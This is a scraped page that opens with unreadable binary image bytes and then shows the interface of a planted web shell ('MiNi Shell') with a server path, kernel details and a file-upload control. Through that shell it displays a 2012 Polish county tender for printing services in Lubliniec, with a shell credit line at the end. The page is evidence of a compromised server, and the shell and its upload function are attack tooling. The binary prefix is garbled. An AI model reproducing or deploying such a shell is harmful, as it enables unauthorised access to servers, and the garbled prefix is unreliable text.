JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121115/451952-N-2012.html

<p class="kh_header"><b>Lubliniec: Kompleksowa usługa przygotowania i wykonania materiałów drukowanych dla Powiatu Lublinieckiego.</b><br>
<b>Numer ogłoszenia: 451952 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Paderewskiego 7, 42-700 Lubliniec, woj. śląskie, tel. 034 3510514, faks 034 3510511.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubliniec.starostwo.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa usługa przygotowania i wykonania materiałów drukowanych dla Powiatu Lublinieckiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia kompleksowa usługa przygotowania i wykonania materiałów drukowanych dla powiatu lublinieckiego, w tym m.in. 
1)	gazety powiatowej Ziemia Lubliniecka;
2)	magazynu społeczno-kulturalnego Ziemia Lubliniecka;
3)	informatora dla gimnazjalistów;
4)	kartek okolicznościowych;
5)	plakatów;
6)	ulotek promocyjnych w teczce;
7)	kalendarzy;
8)	kieszonkowych notesów promocyjnych

2.Szczegółowy opis przedmiotu zamówienia: 
ZADANIE I:
Wykonanie projektu graficznego i składu komputerowego oraz druk i dostawa do siedziby Starostwa Powiatowego w Lublińcu 100 egzemplarzy, a do siedziby drukarni Polskapresse Sp. z o.o. przy ul. Daczyńskiego 25a w Sosnowcu - Milowicach pozostałej ilości egzemplarzy gazety powiatowej Ziemia Lubliniecka.

Format: 240 mm x 330 mm
Objętość: 8 stron
Papier: kreda 115 gm2
Druk: obustronny 
Kolor: pełny kolor 4+4
Łączenie: bez szycia
Nakład: całkowity - 90 000 egzemplarzy (10 000 egzemplarzy w jednej edycji)
Ilość edycji: 9
Zamawiający zastrzega sobie prawo do zwiększenia objętości gazety powiatowej Ziemia Lubliniecka do 12 stron, przy czym cena jednej edycji wydania takiej gazety zwiększy się nie więcej niż o 50%.
Zamawiający zastrzega sobie prawo do zmiany ilości edycji przy zachowaniu stałej ceny jednej edycji. 

ZADANIE II:
Wykonanie projektu graficznego i składu komputerowego oraz druk i dostawa do siedziby Starostwa Powiatowego w Lublińcu magazynu społeczno-kulturalnego Ziemia Lubliniecka.
Format: A4
Objętość: 24 strony
Papier: 
- okładka: kreda 115 gm2
- środek: offset, 80 gm2
Druk: obustronny 
Kolor: 
- okładka: pełny kolor 4+4
- środek: monochromatyczny
Łączenie: dwie metalowe zszywki wzdłuż dłuższego boku
Nakład: całkowity - 9 000 egzemplarzy (3 000 egzemplarzy w jednej edycji)
Ilość edycji: 3

ZADANIE III:
Wykonanie projektu graficznego i składu komputerowego oraz druk i dostawa do siedziby Starostwa Powiatowego w Lublińcu informatora dla gimnazjalistów.
Format: 160 mm x 240 mm
Objętość: 24 strony
Papier: kreda 115 gm2
Druk: obustronny 
Kolor: pełny kolor 4+4
Łączenie: dwie metalowe zszywki wzdłuż dłuższego boku
Nakład: 900 egzemplarzy 

ZADANIE IV:
Wykonanie projektu graficznego oraz druk i dostawa do siedziby Starostwa Powiatowego w Lublińcu kartek okolicznościowych.
Format: 420 mm x 99 mm składany do wym. 210 mm x 99 mm
Papier: kreda foliowana matowa, min. 200 g/m2
Druk: obustronny 
Kolor: pełny kolor 4+4
Nakład: 2 x 1 000 + 1 x 600
Ilość edycji: 3 (2 x 1 000 + 1 x 600)

ZADANIE V:
Wykonanie projektu graficznego oraz druk i dostawa do siedziby Starostwa Powiatowego w Lublińcu  plakatów.
Format: B3
Papier: kreda matowa min. 125 g/m2
Druk: jednostronny
Kolor: pełny kolor 4+4
Nakład: 100
Ilość edycji: 3 

ZADANIE VI:
Wykonanie projektu graficznego oraz druk i dostawa do siedziby Starostwa Powiatowego w Lublińcu ulotek promocyjnych w teczce.
a) ulotki:
Format: 210 mm x 100 mm
Papier: kreda matowa min. 150 g/m2
Druk: dwustronny
Kolor: pełny kolor 4+4
Nakład: 7 200 szt. (6 różnych wersji ulotek x 1000 szt. + 6 różnych wersji ulotek x 100 szt. + 6 różnych wersji ulotek x 100 szt.)
b) teczka:
Format: 214 mm x 105 mm
Papier: kreda foliowana matowa, min. 200 g/m2
Druk: jednostronny
Kolor: pełny kolor 4+4
Nakład: 2 000 szt. 

ZADANIE VII:
Wykonanie projektu graficznego oraz druk i dostawa do siedziby Starostwa Powiatowego w Lublińcu trzech wersji kalendarzy na 2014 rok:
a) kalendarz jednoarkuszowy: 
Format: B3
Papier: kreda foliowana matowa min. 150 g/m2, 
Druk: jednostronny
Kolor: pełny kolor 4+4
Nakład: 400
b) kalendarz trójdzielny: 
Format: 
- całkowity: 310 mm x 850 mm
- kalendarium: 310 mm x 150 mm (jeden miesiąc) 
Papier: 
- główka: tektura introligatorska 920 g + okleina 230 g folia matowa 
- plecki: tektura 300 g
- kalendarium: offset min. 80 g/m2
Druk: jednostronny
Kolor: 
- główka i plecki: pełny kolor 4+4
- kalendarium: druk dwukolorowy
Nakład: 200
c) kalendarz biurkowy - terminarz stojący spiralowy zawierający kalendarium w układzie tygodniowym 
Format: 300 mm x 120 mm
Papier: 
- podstawa kalendarza/plecki: tektura 300 g + okleina 230 g folia matowa
- pierwsza strona/okładka: kreda foliowana matowa min. 170 g/m2
- kalendarium: offset min. 80 g/m2
Druk: jednostronny
Kolor: 
- podstawa kalendarza/plecki: pełny kolor 4+4
- pierwsza strona/okładka: pełny kolor 4+4
- kalendarium: druk dwukolorowy
Nakład: 100

ZADANIE VIII:
Wykonanie projektu graficznego oraz druk i dostawa do siedziby Starostwa Powiatowego w Lublińcu składanych kieszonkowych notesów promocyjnych
Format: 
- całkowity (okładki): 310 mm x 90 mm; okładka dzielona na trzy równe części, tak aby po złożeniu powstał prostokąt o wym. ok. 100 mm x 90 mm (2 grzbiety po 5 mm),
- notesu: ok. 95 mm x 80 mm; notes wklejony w środkową część okładki (min. 50 str.)
Papier: 
- okładka: kreda foliowana min. 200 gm2
- notes: offset min. 80 g/m2
Druk: jednostronny
Kolor: 
- okładka: pełny kolor 4+4
- notes: monochromatyczny, kratkowany, na dole dane teleadresowe
Nakład: 1000

3.Zamawiający żąda by Wykonawca wskazał w ofercie część zamówienia, której wykonanie chce powierzyć podwykonawcom. Jeżeli Wykonawca ma zamiar zlecić wykonanie części prac podwykonawcy to musi wypełnić i załączyć do oferty załącznik nr 2 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych w wysokości nie przekraczającej 20% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia przewidzianego w ogłoszeniu o zamówieniu dla zamówienia podstawowego i zgodnego z przedmiotem zamówienia podstawowego (wykonaniu dodruków ww. zadań).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 79.82.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępujący do przetargu musi wpłacić wadium w wysokości: 1 500,00 zł. (słownie: jeden tysiąc pięćset złotych 00/100).
Wadium należy wnieść skutecznie do dnia 26 listopada 2012r. do godz. 09.30.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż wykonał co najmniej 1 usługę w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, w zakresie usług polegających na opracowaniu projektu graficznego i przygotowaniu do druku broszur/wydawnictw promocyjnych, o wartości nie mniejszej niż 50 000,00 złotych, oraz załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo do zmiany umowy w formie aneksu podpisanego przez obie strony w przypadku:
1.urzędowej zmiany stawki podatku VAT - aneks regulować będzie wysokość podatku VAT i ceny brutto umowy;
2.zmiany ilości edycji gazety powiatowej Ziemia Lubliniecka - aneks regulować będzie ilość edycji oraz wysokość wynagrodzenia za wykonanie przedmiotu umowy przy założeniu, że cena jednej edycji pozostanie bez zmian;
3.zwiększenia objętości gazety powiatowej Ziemia Lubliniecka do 12 stron - aneks regulować będzie wysokość wynagrodzenia za wykonanie przedmiotu umowy przy założeniu, że cena jednej edycji takiej gazety zwiększy się nie więcej niż o 50 %.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubliniec.starostwo.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lublińcu
ul. Paderewskiego 7
42 - 700 Lubliniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2012 godzina 09:30, miejsce: Starostwo Powiatowe w Lublińcu
ul. Paderewskiego 7
42 - 700 Lubliniec
pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 25.12.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com